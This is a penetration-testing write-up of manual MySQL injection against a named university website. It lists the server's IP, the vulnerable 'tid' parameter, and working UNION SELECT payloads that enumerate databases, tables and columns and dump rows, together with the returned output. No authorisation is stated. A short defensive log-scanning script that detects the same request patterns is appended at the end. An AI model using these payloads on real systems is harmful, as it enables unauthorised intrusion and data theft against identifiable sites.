Notes on a Manual MySQL Injection Case
[Penetration Testing]
A record of manually injecting the MySQL database behind one of the university's sites.
Information gathering
Discovery method
Subdomain scan -> import into AWVS -> batch scan for blind injection
URL
http://home.bjtu.edu.cn/
Info (whatweb)
- 202.112.147.124 (university intranet)
- Apache/2.4.9
- Win64
- PHP/5.5.12
Parameter
http://home.bjtu.edu.cn/ctrl/vote/ajax_vote_response.php?req=3&tid=1
- tid (GET)
Testing
Confirming the injection => tid
A semicolon triggers an error, and the message is echoed back:
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6
Determining the version (>4.0)
and ord(mid(version(),1,1))>51
The page returns normally, so the version is >4.0 and UNION is supported.
Finding the column count => 5
ORDER BY with binary search
tid=1 and order by 6
=> Unknown column '6' in 'order clause'
tid=1 and order by 5
=> [{"item_title":"3","item_id":"3","item_count":36},{"item_title":"4","item_id":"4","item_count":22},{"item_title":"5","item_id":"5","item_count":66},{"item_title":"\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b92","item_id":"2","item_count":84},{"item_title":"\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b9\u4e00","item_id":"1","item_count":103}]
UNION SELECT
tid=1 and 1=2 union select 1,2,3,4,5...,n
- Error output:
The used SELECT statements have a different number of columns
- Correct output:
[{"item_title":"2","item_id":"1","item_count":4}]
Information gathering
and 1=2 union select [function],-1,-1,-1,-1
- version(): database version => 5.6.17
- database(): currently connected database => stu
- @@version_compile_os: operating system => Win64
- @@datadir: database data directory => c:\wamp\bin\mysql\mysql5.6.17\data\
- @@basedir: MySQL installation path
Getting all database names
In:
select * from stu where tid=1
and 1=2 union select SCHEMA_NAME,-1,-1,-1,-1 from information_schema.schemata;
Or:
select * from stu where tid=1
and 1=2 union select table_schema,-1,-1,-1,-1 from information_schema.columns;
Out:
[{"item_title":"-1","item_id":"information_schema","item_count":-1},
{"item_title":"-1","item_id":"mysql","item_count":-1},
{"item_title":"-1","item_id":"performance_schema","item_count":-1},
{"item_title":"-1","item_id":"stu","item_count":-1},
{"item_title":"-1","item_id":"student","item_count":-1}]
Getting the table names in stu
In (the result is wrapped in the marker 0x5B78786F6F5D, which decodes to [xxoo], so it is easy to pick out of the output):
select * from stu where tid=1
and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT table_name),0x5B78786F6F5D),-1,-1,-1,-1 from information_schema.columns where table_schema="stu";
Out:
[{"item_title":"-1","item_id":"[xxoo]
fsa_about,
fsa_contest_and_project,
fsa_css3_example,
fsa_nav_feedback,
fsa_nav_feedback_type,
fsa_nav_list,
fsa_nav_page_list,
fsa_nav_page_list_1,
fsa_nav_page_list_395,
fsa_nav_page_list_396,
fsa_nav_page_list_398,
fsa_nav_page_list_399,
fsa_nav_page_list_400,
fsa_nav_page_list_401,
fsa_nav_page_list_402,
fsa_nav_page_list_403,
fsa_nav_page_list_404,
fsa_nav_
...
[xxoo]","item_count":-1}]
Getting the column names of fsa_vote_topic
In:
and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT column_name),0x5B78786F6F5D),-1,-1,-1,-1 from information_schema.columns where table_name='fsa_vote_topic'
Out:
[{"item_title":"-1","item_id":"[xxoo]
topic_id,
topic_title,
topic_type_id
[xxoo]","item_count":-1}]
Determining the row count
In:
and 1=2 union select concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic
Out:
[{"item_title":"-1","item_id":"[xxoo]
12
[xxoo]","item_count":-1}]
Getting the field values
In:
Incrementing the LIMIT offset one row at a time dumps the remaining rows.
and 1=0 union select concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic LIMIT 0,1
Out:
[{"item_title":"-1","item_id":"[xxoo]
\u5b66\u4e60\u8bdd\u98981
[xxoo]","item_count":-1}]
After decoding => 学习话题1
Note
When writing the payload, pay special attention: arguments inside functions are not quoted, while values assigned with an equals sign must be quoted.
Unquoted case (topic_title, fsa_vote_topic):
concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D)
from fsa_vote_topic LIMIT 0,1
Quoted case (assignment with =):
where table_name='fsa_vote_topic'
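From the defender's side, the enumeration above leaves a very recognisable trail in the web server's access log. The following script is an added example, not part of the original write-up: it scans constructed Apache access-log lines (IP addresses and timestamps are invented) for the request patterns this post uses against the tid parameter (ORDER BY probing, UNION SELECT padding, information_schema enumeration and the 0x5B78786F6F5D "[xxoo]" marker) and flags the source that issues them in sequence.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Request patterns taken from the payloads shown in this write-up.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "hex_delimiter": re.compile(r"0x5b78786f6f5d", re.I),  # "[xxoo]" marker
    "version_probe": re.compile(r"version\(\)|@@(?:version_compile_os|datadir|basedir)", re.I),
}

# Apache common log format (no referer/user-agent fields).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines replaying the probes from the post (addresses and times are invented).
LOG_LINES = """\
203.0.113.7 - - [10/Oct/2016:10:00:01 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1 HTTP/1.1" 200 310
203.0.113.7 - - [10/Oct/2016:10:00:05 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20order%20by%206 HTTP/1.1" 200 95
203.0.113.7 - - [10/Oct/2016:10:00:09 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%201=2%20union%20select%201,2,3,4,5 HTTP/1.1" 200 52
203.0.113.7 - - [10/Oct/2016:10:00:14 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%201=2%20union%20select%20concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-1,-1,-1,-1%20from%20information_schema.columns%20where%20table_schema=%22stu%22 HTTP/1.1" 200 1180
198.51.100.9 - - [10/Oct/2016:10:00:20 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=2 HTTP/1.1" 200 305
"""

def scan_request(target):
    """Return the sorted signature names matched in any query parameter of a request target."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl already decoded once; this catches a second layer
        hits.update(sig for sig, rx in SIGNATURES.items() if rx.search(decoded))
    return sorted(hits)

def scan_log(text):
    """Return (ip, status, hits) for every parsable request that matched at least one signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits = scan_request(m["target"])
            if hits:
                findings.append((m["ip"], int(m["status"]), hits))
    return findings

def suspicious_ips(findings, min_requests=2):
    """IPs with at least min_requests flagged requests: enumeration is a sequence, not one hit."""
    counts = Counter(ip for ip, _status, _hits in findings)
    return sorted(ip for ip, n in counts.items() if n >= min_requests)
```

Note that every flagged request here returned HTTP 200, so status codes alone would not have revealed the probing; the parameter content and the per-source sequence are what give it away.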